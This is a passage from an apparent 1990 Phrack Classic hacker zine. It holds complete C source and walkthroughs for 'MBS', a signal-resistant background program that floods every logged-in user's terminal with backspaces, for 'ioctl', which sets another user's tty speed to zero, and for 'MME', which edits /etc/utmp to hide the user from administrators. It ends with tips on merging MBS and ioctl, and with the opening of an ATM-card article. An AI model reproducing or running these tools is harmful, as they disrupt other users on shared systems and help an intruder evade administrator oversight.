  2104.         handle = open(etc,O_RDONLY);
  2105.  
  2106.         while(read(handle,&user,sizeof(user)) != 0) {
  2107.                 if (user.ut_type == USER_PROCESS)
  2108.                 printf("%s is on %s\n",user.ut_name,user.ut_line);
  2109.         }
  2110.         close(handle);
  2111.  
  2112. /* Simple, Right? */
  2113. /* To see anything that is waiting for a login, change USER_PROCESS
  2114. to LOGIN_PROCESS */
  2115. }
  2116.  
  2117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2118.  
  2119.         In the above program, this is what happens:
  2120.         1.  I assigned the variable "etc" to point at the string
  2121.                 "/etc/utmp", which is the utmp file.
  2122.         2.  I opened in in Read ONLY mode (O_RDONLY).
  2123.         3.  I started a loop that does not end until 0 bytes are
  2124.             read into the user structure.  The 0 bytes would mean
  2125.             end of file.
  2126.  
  2127.         Notice the line:
  2128.         if (user.ut_type == USER_PROCESS)
  2129.  
  2130.         What the above line does is to distinguish between a user
  2131.         and a terminal waiting for a Login.  The ut_type is defined
  2132.         in utmp.h.  There are many types.  One of them is LOGIN_PROCESS.
  2133.         That will be a terminal waiting for a login.  If you wanted to see
  2134.         all the TTYs waiting to be logged in on, you would change the
  2135.         USER_PROCESS to LOGIN_PROCESS.  Other types are things like
  2136.         INIT_PROCESS.  You can just look in utmp.h to see them.
  2137.  
  2138.         Also notice that I have inclide "sys/types.h".  If you do not include
  2139.         this file, there will be an error in utmp.h, and other headers.
  2140.         types.h has definitions for other TYPES of data, etc.  So, if in
  2141.         a header file you encounter a syntax error, you might need to include
  2142.         sys/types.h
  2143.  
  2144.         This program is just a skeleton, although it does print out who
  2145.         is logged on, and to what TTY they are on.  You will see how this
  2146.         skeleton I wrote can be used.  I used it to write MBS.
  2147.  
  2148. _______________________________________________________________________________
  2149.  
  2150.  
  2151. o MBS -- Mass BackSpace virus:
  2152.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2153.  
  2154.         MBS may not be considered a virus, since it does not replicate
  2155.         itself.  However, it does "infect" every user that logs in, provided
  2156.         the conditions are right.
  2157.  
  2158.         The MBS virus uses the utmp reader to constantly read the utmp
  2159.         file to find its next victim. Thus, eventually getting everyone, then
  2160.         recycling to start again. Therefore catching people who login after
  2161.         it is started.
  2162.  
  2163.         Lets look at the source:
  2164.  
  2165. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2166.  
  2167. #include <stdio.h>
  2168. #include <sys/types.h>
  2169. #include <utmp.h>
  2170. #include <fcntl.h>
  2171. #include <signal.h>
  2172. /*
  2173.    MBS - Mass BackSpace Virus!! v2.2 Deluxe+
  2174.    (c) 1990 - Sir Hackalot
  2175.    PhaZeSOFT Ltd.
  2176.  
  2177. */
  2178.  
  2179. char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
  2180. int maxitem = 5; /* Should be total # of immune dudes */
  2181. int truefalse = 0;
  2182. int warn[10],bad;
  2183. char full_tty[15], text[160],  kstr[80];
  2184. FILE *to_tty, *strm;
  2185. struct utmp u;
  2186.  
  2187.  
  2188. void kmes(fmt,boo)
  2189. char *fmt;
  2190. int boo;
  2191. {
  2192.         if (boo != 0) {
  2193.                 printf("MBS_KERN: ");
  2194.                 printf("%s",fmt);
  2195.         }
  2196.         if (boo == 0) {
  2197.                 sprintf(full_tty,"/dev/%s",u.ut_line);
  2198.                 to_tty = fopen(full_tty,"w");
  2199.                 fprintf(to_tty,"MBS_KERN: %s",fmt);
  2200.                 fclose(to_tty);
  2201.         }
  2202. }
  2203.  
  2204. void initit() {  /* Initialize our little "kernel" */
  2205.         int xxx = 0;
  2206.         strcpy(ent[0],"technic");
  2207.         strcpy(ent[1],"merlin");
  2208.         strcpy(ent[2],"datawiz");
  2209.         strcpy(ent[3],"par");
  2210.         strcpy(ent[4],"Epsilon");
  2211.         while (xxx < 11) {
  2212.                 warn[xxx] = 0;
  2213.                 xxx++;
  2214.         }
  2215.         kmes("Kernel Started.\n",1);
  2216. }
  2217.  
  2218. void warnem(wcnt) /* Notify all the immune people ... */
  2219. int wcnt;
  2220. {
  2221.         if (bad == 0) { /* keep from dumping core to disk */
  2222.                 if (warn[wcnt] < 2) {
  2223.                         sprintf(kstr,"%s has started a backspace virus!\n",getlo
  2224.                         kmes(kstr,0);
  2225.                         warn[wcnt]++;
  2226.                 }
  2227.         }
  2228. }
  2229.  
  2230.  
  2231. int checkent(uname) /* Check for immunity */
  2232. char *uname;
  2233. {
  2234.         int cnt = 0;
  2235.         truefalse = 0; /* assume NOT immune */
  2236.         while (cnt < maxitem) {
  2237.                 if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
  2238.                         truefalse = 1;
  2239.                         warn[cnt]++; /* increment warning variable */
  2240.                         warnem(cnt); /* warn him if we have not */
  2241.                 }
  2242.  
  2243.                 cnt++;
  2244.         }
  2245.         return(truefalse); /* return immunity stat. 1=immune, 0 = not */
  2246. }
  2247.  
  2248.  
  2249. /* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
  2250. to intercept it, and notify use */
  2251. void sig_hand(sig)
  2252. int sig;
  2253. {
  2254. if(sig == 3) kmes("Ignoring Interrupt\n",1);
  2255. if(sig == 15) kmes("Ignoring Termination Signal\n",1);
  2256. if(sig == 4) kmes("Ignoring quit signal.\n",1);
  2257.         }
  2258.  
  2259. main(argc,argv)
  2260. int argc;
  2261. char *argv[];
  2262.  
  2263. {
  2264.         int prio,pid,isg,handle;
  2265.         char buf[80];
  2266.         char name[20],tty[20],time[20];
  2267.         initit();
  2268.         if (argc < 2) prio = 20;
  2269.         if (argc == 2) prio = atoi(argv[1]);
  2270.         if ((pid = fork()) > 0) {
  2271.         printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
  2272.                 printf("Another Fine PhaZeSOFT production\n");
  2273.                 printf("Thanks to The DataWizard for Testing this\n");
  2274.                 printf("Hello to The Conflict\n");
  2275.                 sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
  2276.                 kmes(kstr,1);
  2277.                 exit(0); /* KILL MOTHER PID, return to Shell & go background */
  2278.         }
  2279.         nice(prio);
  2280.         signal(SIGQUIT,sig_hand);
  2281.         signal(SIGINT,sig_hand);
  2282.         signal(SIGTERM,sig_hand);
  2283.         /* That makes sure you HAVE to do a -9 or -10 to kill this thing.
  2284.            Sometimes, hitting control-c will kill of background processes!
  2285.            Add this line if you want it to continue after you hangup:
  2286.            signal(SIGHUP,SIG_IGN);
  2287. doing it will have the same effect as using NOHUP to
  2288. to execute it. Get it? Nohup = no SIGHUP
  2289. */
  2290.         while(1) {  /* "Kernel" Begins here and never ends */
  2291.                 handle = open("/etc/utmp",O_RDONLY);
  2292.                 while (read(handle,&u,sizeof(u)) != 0) {
  2293.                         bad = 0;
  2294.                         sprintf(full_tty,"/dev/%s",u.ut_line);
  2295.                         if (strcmp(u.ut_name,getlogin()) != 0) {
  2296.  
  2297.          /* Fix: Below is a line that optimizes the hosing/immune process
  2298.             It skips the utmp entry if it is not a user.  If it is, it
  2299.             checks for immunity, then comes back. This is alot faster
  2300.             and does not wear down cpu time/power */
  2301.  
  2302.                if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
  2303.                else isg = 1;
  2304.                  if (isg != 1) {
  2305.                                         if((to_tty = fopen(full_tty,"w")) == NUL
  2306.                                                 bad = 1;
  2307.                                         }
  2308.                                         if (bad == 0) {
  2309.                                                 fprintf (to_tty, "\b\b\b");
  2310.                                                 fflush (to_tty);
  2311.                                         }
  2312.                                         fclose(to_tty);
  2313.                                 }
  2314.                         }
  2315.                 }
  2316.                 close (handle);
  2317.         }
  2318. }
  2319.  
  2320. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2321.  
  2322.         I am going to try to take this bit by bit and explain how it works
  2323.         so that maybe you can come up with some good ideas on creating
  2324.         something similar.
  2325.  
  2326.         I will start with the MAIN function.  Here it is:
  2327.  
  2328. ___
  2329.  
  2330. main(argc,argv)
  2331. int argc;
  2332. char *argv[];
  2333.  
  2334. {
  2335.         int prio,pid,isg,handle;
  2336.         char buf[80];
  2337.         char name[20],tty[20],time[20];
  2338.         initit();
  2339. ___
  2340.  
  2341.         Obviously, this is the part of the code which initializes the main
  2342.         variables used.  The "main(argc,argv)" is there so it can accept
  2343.         command line parameters.  The command line parameters are just
  2344.         for speed customization, which I will discuss later.  Notice how
  2345.         the variables are defined for the command line parameters:
  2346.  
  2347.         int argc, char *argv[];
  2348.  
  2349.         argc is the number of arguments, INCLUDING the name of the current
  2350.         executable running.  argv[] holds the strings in an array which make
  2351.         up the parameters passed.  argv[0] holds the name of the program,
  2352.         while argv[1] holds the 1st parameter entered on the command line.
  2353.         initit() is called to set up the necessary tables.  All of
  2354.         the variables defined at the top of the program are global, and alot
  2355.         of these functions use the global variables, as does initit();.
  2356.  
  2357. ___
  2358.  
  2359. if (argc < 2) prio = 20;
  2360. if (argc == 2) prio = atoi(argv[1]);
  2361. ___
  2362.  
  2363.         Ok, the above two lines essentially parse the command line.
  2364.         The MBS program only accepts ONE argument, which is the priority
  2365.         value to add to the normal process priority.  This is so you
  2366.         can customize how fast MBS runs.  If you want to burn CPU time,
  2367.         you would invoke mbs by:
  2368.         $ mbs 0
  2369.  
  2370.         That would make the priority as fast as the current can run something.
  2371.         MBS's default priority setting is 20, so that CPU time will be saved.
  2372.         MBS is very fast however, and since alot of Unix systems like to
  2373.         cache alot of frequently used data from disks, it gets fast after
  2374.         it reads utmp a few times, since utmp will be cached until it changes.
  2375.         However, you can run MBS with a number from 0-19, the higher the
  2376.         number, the "less" priority it will have with the cpu.
  2377.  
  2378.  
  2379. ___
  2380.  
  2381. if ((pid = fork()) > 0) {
  2382.   printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
  2383.   printf("Another Fine PhaZeSOFT production\n");
  2384.   sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
  2385.   kmes(kstr,1);
  2386.   exit(0); /* KILL MOTHER PID, return to Shell & go background */
  2387. }
  2388.  
  2389. ___
  2390.  
  2391.         The above is what sends MBS into the background.  It calls fork(),
  2392.         which creates another process off the old one.  However, fork()
  2393.         can be considered "cloning" a process, since it will use anything
  2394.         beneath it.  So, now you can assume there are TWO copies of MBS
  2395.         running -- One in the foreground, and one in the background.  However,
  2396.         you may notice the exit(0).  That first exit kills off the parent.
  2397.         a second call to exit() would kill the child as well.  notice the
  2398.         call to "kmes".  kmes is just a function that is defined earlier,
  2399.         which I will discuss later.
  2400. ___
  2401.  
  2402. nice(prio);
  2403. signal(SIGQUIT,sig_hand);
  2404. signal(SIGINT,sig_hand);
  2405. signal(SIGTERM,sig_hand);
  2406. /*   signal(SIGHUP,SIG_IGN); */
  2407. ___
  2408.  
  2409.         The above code is integral for the survival of the MBS program in
  2410.         memory.  The nice(prio) is what sets the new priority determined
  2411.         by the command line parsing.
  2412.  
  2413.         The signal() statements are basically what keeps MBS running.  What
  2414.         it does is catch INTERRUPTS, Quits, and a regular call to KILL.
  2415.         the commented out portion would ignore requests to kill upon hangup.
  2416.         This would keep MBS in the background after you logged off.
  2417.  
  2418.         Why do this?  Well, remember that the parent was affected by
  2419.         its environment?  Well, the new forked process is too.  That means,
  2420.         if you were 'cat'ting a file, and hit control-C to stop it, the
  2421.         cat process would stop, but push the signal on to MBS, which would
  2422.         cause MBS to exit, if it did not have a signal handler.  The signal
  2423.         calls setup signal handlers.  What they do is tell the program
  2424.         to goto the function sig_hand() when one of the 3 signals is
  2425.         encountered.  The commented signal just tells the program to ignore
  2426.         the hangup signal.  The sig_hand argument can be replaced with
  2427.         SIG_IGN if you just want to plain ignore the signal and not handle it.
  2428.  
  2429.         The SIGQUIT is sometimes the control-D character.  That is why it
  2430.         also must be dealt with.  If the signals aren't ignored or caught,
  2431.         MBS can easily kicked out of memory by YOU, by accident of course.
  2432.  
  2433. ___
  2434.  
  2435. while(1) {  /* "Kernel" Begins here and never ends */
  2436.      handle = open("/etc/utmp",O_RDONLY);
  2437. ___
  2438.  
  2439.         The above starts the main loop.  The begining of the loop is to open
  2440.         the utmp file.
  2441.  
  2442. ___
  2443.  
  2444.  while (read(handle,&u,sizeof(u)) != 0) {
  2445.       bad = 0;
  2446.       sprintf(full_tty,"/dev/%s",u.ut_line);
  2447.       if (strcmp(u.ut_name,getlogin()) != 0) {
  2448.         if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
  2449.            else isg = 1;
  2450.         if (isg != 1) {
  2451.            if((to_tty = fopen(full_tty,"w")) == NULL)  {
  2452.               bad = 1;
  2453.               }
  2454.            if (bad == 0) {
  2455.               fprintf (to_tty, "\b\b\b");
  2456.               fflush (to_tty);
  2457.               }
  2458.               fclose(to_tty);
  2459.         }
  2460.     }
  2461. ___
  2462.  
  2463.  
  2464.         Above is the sub_main loop.  what it does is go through the utmp
  2465.         file, and on each entry, it prepares a path name to the TTY
  2466.         of the current utmp entry (sprintf(fulltty...)).  Then it checks
  2467.         to see if it is YOU.  If it is, the loop ends.  If it is not, then
  2468.         it sees if it is a User.   If not, it ends the loop and goes to
  2469.         the next.
  2470.  
  2471.         If it is a user, it goes to checkent to see if that user has been
  2472.         declared immune in the immunity tables (down below later..).
  2473.         If the idiot is not immune, it attempts to open their tty.  If it
  2474.         cannot, it sets the bad flag, then ends the loop.  If it can be
  2475.         written to, it sends three backspaces, according to YOUR tty specs.
  2476.         Then, it closes the opened tty, and the loop continues until the end.
  2477.  
  2478. ___
  2479.  
  2480.        }
  2481. close (handle);
  2482.     }
  2483. }
  2484.  
  2485. ___
  2486.  
  2487.         The above is the end of the main loop.  It closes handle (utmp) so
  2488.         it can be reopened at the start of the loop at the beginning of the
  2489.         file.  The reason to not create a table of people to hit in memory
  2490.         after one reading is so that MBS will stop after people logoff, and
  2491.         to start when new ones logon.  The constant reading of the utmp
  2492.         file makes sure everyone gets hit, except immune people.  Also,
  2493.         the file must be closed before reopening, or else, after a few opens,
  2494.         things will go to hell.
  2495.  
  2496.  
  2497. Here is the signal handler:
  2498.  
  2499. ___
  2500.  
  2501. void sig_hand(sig)
  2502. int sig;
  2503. {
  2504. if(sig == 3) kmes("Ignoring Interrupt\n",1);
  2505. if(sig == 15) kmes("Ignoring Termination Signal\n",1);
  2506. if(sig == 4) kmes("Ignoring quit signal.\n",1);
  2507.         }
  2508. ___
  2509.  
  2510.         It is very simple.  when a signal is caught and sent to the handler,
  2511.         the library function SIGNAL sends the signal number as an argument
  2512.         to the function.  The ones handled here are 3,4, and 15.  But
  2513.         this was just for effect.  You could just have it print one line
  2514.         no matter what the signal was, or just rip this function out and
  2515.         put in SIG_IGN in the signal calls.
  2516.  
  2517.         Below is the immunity check:
  2518. ___
  2519.  
  2520. int checkent(uname) /* Check for immunity */
  2521. char *uname;
  2522. {
  2523.         int cnt = 0;
  2524.         truefalse = 0; /* assume NOT immune */
  2525.         while (cnt < maxitem) {
  2526.                 if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
  2527.                         truefalse = 1;
  2528.                         warn[cnt]++; /* increment warning variable */
  2529.                         warnem(cnt); /* warn him if we have not */
  2530.                 }
  2531.  
  2532.                 cnt++;
  2533.         }
  2534.         return(truefalse); /* return immunity stat. 1=immune, 0 = not */
  2535. }
  2536.  
  2537. ___
  2538.  
  2539.         Above, you see variables used that are not defined.  They are
  2540.         just variables that were declared as globals at the begining.
  2541.         What this does is just compare the login name sent to it with
  2542.         every name in the immunity table.  If it finds the name on
  2543.         the table matches, it will go and see if it should warn the
  2544.         user.  Also, the warn count is incremented so that the warning
  2545.         function will know if the user has been warned.
  2546.  
  2547.         Here is the warning function:
  2548.  
  2549. ___
  2550.  
  2551. void warnem(wcnt) /* Notify all the immune people ... */
  2552. int wcnt;
  2553. {
  2554.         if (bad == 0) { /* keep from dumping core to disk */
  2555.                 if (warn[wcnt] < 2) {
  2556.                         sprintf(kstr,"%s has started a backspace virus!\n",getlo
  2557.                         kmes(kstr,0);
  2558.                         warn[wcnt]++;
  2559.                 }
  2560.         }
  2561. }
  2562. ___
  2563.  
  2564.         What this does is take the position number of the table entry and
  2565.         checks and see if that entry has been warned before.  It decides
  2566.         this by checking its value.  If it is less than two, that means
  2567.         the user had not been warned.  After it is sent, the function
  2568.         incrememnts the warning flag so that they will never been warned
  2569.         again until the program has stopped & restarted or someone else
  2570.         runs one.  The "if (bad == 0)" is there so that it only warns a
  2571.         person if it can write to the tty.
  2572.  
  2573.         Here is the kmes function you keep seeing:
  2574.  
  2575. ___
  2576.  
  2577. void kmes(fmt,boo)
  2578. char *fmt;
  2579. int boo;
  2580. {
  2581.         if (boo != 0) {
  2582.                 printf("MBS_KERN: ");
  2583.                 printf("%s",fmt);
  2584.         }
  2585.         if (boo == 0) {
  2586.                 sprintf(full_tty,"/dev/%s",u.ut_line);
  2587.                 to_tty = fopen(full_tty,"w");
  2588.                 fprintf(to_tty,"MBS_KERN: %s",fmt);
  2589.                 fclose(to_tty);
  2590.         }
  2591. }
  2592. ___
  2593.         All this is, is a fancy printf which prints a string with
  2594.         "MBS_KERN:" stuck on the front of it.  the BOO variable is just
  2595.         so it can determine whether or not to send it to the local
  2596.         screen or to another tty.  It is just for looks.
  2597.  
  2598.         Now, finally, we can look at the initializer:
  2599.  
  2600. ___
  2601.  
  2602. void initit() {  /* Initialize our little "kernel" */
  2603.         int xxx = 0;
  2604.         strcpy(ent[0],"sirh");
  2605.         strcpy(ent[1],"merlin");
  2606.         strcpy(ent[2],"datawiz");
  2607.         strcpy(ent[3],"par");
  2608.         strcpy(ent[4],"epsilon");
  2609.         while (xxx < 11) {
  2610.                 warn[xxx] = 0;
  2611.                 xxx++;
  2612.         }
  2613.         kmes("Kernel Started.\n",1);
  2614. }
  2615. ___
  2616.  
  2617.         This is a very SIMPLE procedure.  It just fills the list
  2618.         with the people to keep immune.  ent[..][..] is what holds
  2619.         the immune list.  It also zeros out the warning flags associated
  2620.         with each user.  ("sirh","merlin","par",etc. are acct. names)
  2621.  
  2622.         This "virus" can do more than just send backspaces if you want it
  2623.         to, but it will take modification.  Some people have modified
  2624.         it to include the next program, which is ioctl.c.
  2625.  
  2626. _______________________________________________________________________________
  2627.  
  2628.  
  2629.  
  2630. o IOCTL -- Set another's tty w/out read perms
  2631.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2632.  
  2633.         The program ioctl is very very nice.  What it does is basically
  2634.         act like stty, but you don't have to use the < to change
  2635.         someone else's terminal.  Here is the listing:
  2636.  
  2637. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2638.  
  2639. #include <stdio.h>
  2640. #include <sys/types.h>
  2641. #include <fcntl.h>
  2642. #include <sgtty.h>
  2643. #define TIOC ('T'<<8)
  2644. #define TCSETA (TIOC|2)
  2645.  
  2646. main(argc,argv)
  2647. int argc;
  2648. char *argv[];
  2649. {
  2650.         int x;
  2651.         struct sgttyb histty;
  2652.         if (argc == 1) exit(0);
  2653.         x = open(argv[1],O_WRONLY);
  2654.         if (x == -1) exit(0);
  2655.         histty.sg_ispeed = B0;
  2656.         histty.sg_ospeed = B0;
  2657.         ioctl(x,TCSETA,&histty);
  2658. }
  2659.  
  2660. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2661.  
  2662.         The basis of the program is that you give a full path to the tty
  2663.         to nail.  You need to be able to write to the tty for it to work.
  2664.  
  2665.         Notice the two defines.  They are in there so you do not have
  2666.         to include termio.h, and hence get 200 warnings of redefinition.
  2667.         This program is WAY simpler than MBS, but here is how it works:
  2668.  
  2669. ___
  2670.  
  2671. main(argc,argv)
  2672. int argc;
  2673. char *argv[];
  2674. ___
  2675.  
  2676.         Of course, the above sets up the program to get command line
  2677.         arguments.
  2678.  
  2679. ___
  2680.  
  2681.         int x;
  2682.         struct sgttyb histty;
  2683. ___
  2684.  
  2685.         These are the variables.  the sgttyb structure is what the ioctl
  2686.         function call needs to do its duty.  You can do a lot to a tty
  2687.         using the structure, but this program only does 2 things to the
  2688.         tty, as you shall soon see.  Remember that the programs here can
  2689.         be modified, especially this one.  Just check out sgtty.h to
  2690.         see the modes you can pop a tty into.
  2691.  
  2692. ___
  2693.  
  2694.         if (argc == 1) exit(0);
  2695.         x = open(argv[1],O_WRONLY);
  2696.         if (x == -1) exit(0);
  2697. ___
  2698.  
  2699.         The above three lines are the open/error checks.  The 1st line
  2700.         says that if the idiot did not give an argument then exit
  2701.         the program.  The argument needs to be the path to the
  2702.         device driver (/dev/tty...).
  2703.         The second line opens the tty for writing, and the third exits
  2704.         upon error.
  2705.  
  2706. ___
  2707.  
  2708.         histty.sg_ispeed = B0;
  2709.         histty.sg_ospeed = B0;
  2710.         ioctl(x,TCSETA,&histty);
  2711. ___
  2712.  
  2713.         The above three lines are the meat of the program.  What they
  2714.         do is this:
  2715.  
  2716.         Line 1 sets the input speed to 0 for the tty into the structure.
  2717.         line 2 sets the output speed to 0 for the tty into the structure.
  2718.         line 3 sets the tty according to the structure histty.
  2719.  
  2720.         That is why if you look into the components of the structure, you can
  2721.         do things, such as convert all output to uppercase for them,
  2722.         set a higher baud, redefine CR mapping, redefine tabs, and
  2723.         all sorts of things.
  2724.  
  2725. _______________________________________________________________________________
  2726.  
  2727.  
  2728. o MME - Make ME!:
  2729.   ~~~~~~~~~~~~~~~
  2730.         MME is just a program which changes utmp for you, in order to hide
  2731.         you, or just mess with other user's minds.  This is a different
  2732.         version then the one I originally put out.  In this version,
  2733.         I removed the code that lets you change your tty.  It just became
  2734.         too dangerous to change your tty.
  2735.  
  2736.         Here is the listing:
  2737.  
  2738. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2739.  
  2740. #include <stdio.h>
  2741. #include <fcntl.h>
  2742. #include <sys/types.h>
  2743. #include <utmp.h>
  2744. #include <sys/stat.h>
  2745.  
  2746. char *mytty; /* For an exact match of ut_line */
  2747. char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
  2748. struct utmp *user;
  2749.  
  2750. main(argc,argv)
  2751. int argc;
  2752. char *argv[];
  2753. {
  2754.         int good= 0,cnt = 0,start = 1, index = 0;
  2755.         char err[80];
  2756.         system(backup_utmp);
  2757.     printf("Welcome to MME 1.00 By Sir Hackalot\n");
  2758.     printf("Another PHAZESOFT Production\n");
  2759.     printf("Status:");
  2760.     if (argc == 2) printf("Changing your login to %s\n",argv[1]);
  2761.         if (argc == 1) printf("Removing you from utmp\n");
  2762.  
  2763.         utmpname("/etc/utmp");
  2764.         mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
  2765.         strcpy(mytty,++mytty); /* Make a string starting one pos greater */
  2766.         while (good != 1) {
  2767.                 user = getutent();
  2768.                 cnt++;
  2769.                 if (strcmp(user->ut_line,mytty) == 0) good =1;
  2770.         }
  2771.         utmpname("/etc/utmp"); /* Reset file pointer */
  2772.         for(start = 0;start < cnt;start++) {
  2773.                 user = getutent(); /* Move the file pointer to where we are */
  2774.         }
  2775.  
  2776.  
  2777.     if (argc == 1) {
  2778.      user->ut_type = LOGIN_PROCESS;
  2779.          strcpy(user->ut_name,"LOGIN");
  2780.                    }
  2781.     else user->ut_type = USER_PROCESS;
  2782.  
  2783.         if (argc == 2) strcpy(user->ut_name,argv[1]);
  2784.         pututline(user); /* Rewrite our new info */
  2785.         endutent(); /* Tell the utmp functions we are through */
  2786.         printf("Delete /tmp/utmp.bak if all is well.\n");
  2787.         printf("Else, copy it to /etc/utmp.\n");
  2788. }
  2789.  
  2790. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2791.  
  2792.  
  2793.         Well, of course, we will take this bit by bit.
  2794.         Lets start with the standard ole function:
  2795.  
  2796. ___
  2797.  
  2798. main(argc,argv)
  2799. int argc;
  2800. char *argv[];
  2801. ___
  2802.  
  2803.         This again sets up main so we can accept command line arguments.
  2804.  
  2805. ___
  2806.  
  2807. char *mytty; /* For an exact match of ut_line */
  2808. char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
  2809. struct utmp *user;
  2810. ___
  2811.  
  2812.         These are just global variables.
  2813.         Backup_utmp is the command we will issue to shell for a failsafe
  2814.         mechanism.
  2815.  
  2816. ___
  2817.  
  2818.            system(backup_utmp);
  2819.     printf("Welcome to MME 1.00 By Sir Hackalot\n");
  2820.     printf("Another PHAZESOFT Production\n");
  2821.     printf("Status:");
  2822.     if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
  2823.         if (argc == 1) printf("Removing you from utmp\n");
  2824. ___
  2825.  
  2826.         The above is not hard to figure out.  First, this uses the system
  2827.         command to load shell, and execute our backup command.
  2828.         Then, the lame credits are printed.  Then, it tells you what it
  2829.         is going to do based on the number of arguments passed from the
  2830.         command line.
  2831.         If no arguments are given (argc==1) then remove us from utmp.
  2832.         If there are 1 or more (arc>=2) then change the login name.
  2833.  
  2834. ___
  2835.  
  2836. utmpname("/etc/utmp");
  2837.         mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
  2838.         strcpy(mytty,++mytty); /* Make a string starting one pos greater */
  2839. ___
  2840.  
  2841.         The above code does the following:  utmpname is a system function
  2842.         common to UNIX system V, XENIX system V, etc.  It is part of the
  2843.         utmp reading library.  It sets the thing to be read when the
  2844.         other system calls are made (getutent, etc..).
  2845.         mytty is set to hold one's tty.  It has to break down the result
  2846.         of ttyname(0) to get a ttyname without a path.
  2847.  
  2848. ___
  2849.  
  2850. while (good != 1) {
  2851.                 user = getutent();
  2852.                 cnt++;
  2853.                 if (strcmp(user->ut_line,mytty) == 0) good =1;
  2854.         }
  2855. ___
  2856.  
  2857.  
  2858.         This code gets your relative index from utmp and stores it into
  2859.         cnt.
  2860.  
  2861. ___
  2862.  
  2863. utmpname("/etc/utmp"); /* Reset file pointer */
  2864.         for(start = 0;start < cnt;start++) {
  2865.                 user = getutent(); /* Move the file pointer to where we are */
  2866.         }
  2867. ___
  2868.  
  2869.         The above resets the file pointer used by the system calls, then
  2870.         moves to your entry.
  2871.  
  2872. ___
  2873.  
  2874. if (argc == 1) {
  2875.      user->ut_type = LOGIN_PROCESS;
  2876.          strcpy(user->ut_name,"LOGIN");
  2877.                    }
  2878.     else user->ut_type = USER_PROCESS;
  2879.  
  2880.         if (argc == 2) strcpy(user->ut_name,argv[1]);
  2881.         pututline(user); /* Rewrite our new info */
  2882.         endutent(); /* Tell the utmp functions we are through */
  2883. ___
  2884.  
  2885.         The above is very simple as well.  If you are removing yourself
  2886.         from utmp, it will change your process type to LOGIN_PROCESS
  2887.         so that when someone does a "who", you are not there.
  2888.         It changes your login name to LOGIN so if some knowitall
  2889.         system admin does a who -l, he wont see you.  See, who -l shows
  2890.         ttys waiting for login.  SO, if i did not change your tty name,
  2891.         we would see:
  2892.  
  2893.         $ who -l
  2894.         LOGIN           ttyxx1
  2895.         LOGIN           tty002
  2896.         joehack         tty003
  2897.         LOGIN           tty004
  2898.  
  2899.         See the problem there?  That is why your name needs to be
  2900.         changed to LOGIN.
  2901.         If you are changing your login name, the "else" statment kicks
  2902.         in and makes SURE you WILL show up in utmp, in case you had
  2903.         removed yourself before.
  2904.         Then, it takes the command line argument, and places it as your
  2905.         login name in utmp.
  2906.         pututline(user) then writes the info into the record where the
  2907.         file pointer is... and that is your record.  It puts the contents
  2908.         of the things in the "user" structure into the file.  then, endutent
  2909.         closes the file.
  2910.  
  2911.         Now, here is an example of using the file:
  2912.  
  2913.         # mme Gh0d
  2914.  
  2915.         that would change your login name to Gh0d in utmp.
  2916.  
  2917.         # mme
  2918.  
  2919.         that would remove you from sight.  Remember!!: You need write perms
  2920.         to utmp for this to work.  You CAN test this program by changing
  2921.         the filename in the function "utmpname" to somewhere else, say in
  2922.         /tmp.  You could copy /etc/utmp to /tmp/utmp, and test it there.
  2923.         Then, you could use "who" to read the file in /tmp to show the
  2924.         results.
  2925.  
  2926. _______________________________________________________________________________
  2927.  
  2928.  
  2929. o In Conclusion:
  2930.   ~~~~~~~~~~~~~~
  2931.  
  2932.         These are just some of the programs I decided to put in this file.
  2933.         I have a lot more, but I decided I would keep them for later
  2934.         issues, and leave these two together since they can
  2935.         be easily related.  One person took MBS, and ioctl, and mended
  2936.         them together to make a program that sets everyone's baud
  2937.         rate to zero instead of sending 3 backspaces.  They just put
  2938.         in the above lines of code into the place where they sent
  2939.         the backspaces, and used open instead of stream open (fopen).
  2940.         It is very simple to mend these two things together.
  2941.  
  2942.         Have a nice life!  Keep on programmin'!
  2943.  
  2944.         By: Sir Hackalot of Phaze.
  2945. _______________________________________________________________________________
  2946.  
  2947.                               ==Phrack Classic==
  2948.  
  2949.                      Volume Three, Issue 32, File #6 of 12
  2950.  
  2951.                      +----------------------------------+
  2952.                      ]          Exploration of:         ]
  2953.                      ]  Automatic Teller Machine Cards  ]
  2954.                      ]                                  ]
  2955.                      +----+-------------------------+---+
  2956.                           ]       Written by:       ]
  2957.                           ]      Jester Sluggo      ]
  2958.                           ]                         ]
  2959.                           ] Released: May 13, 1989  ]
  2960.                           ](to Black-Ice:For Review)]
  2961.                           ] Released: Jan 12, 1990  ]
  2962.                           ]    (to Phrack Inc.)     ]
  2963.                           ] Released: Nov, 10, 1990 ]
  2964.                           ]   (to Phrack Classic)   ]
  2965.                           +-------------------------+
  2966.  
  2967.  
  2968. With the North American continent the being the worlds biggest
  2969. consumer of goods and services liquidity of the banking system  has
  2970. become an important factor in our everyday lives.  Savings accounts
  2971. were used by people to keep money safe and used by the banks to
  2972. provide money for loans.  However, due to 'Bankers Hours' (10 AM to
  2973. 3 PM) it was often difficult for people to get access to thier
  2974. money when they needed it.
  2975.  
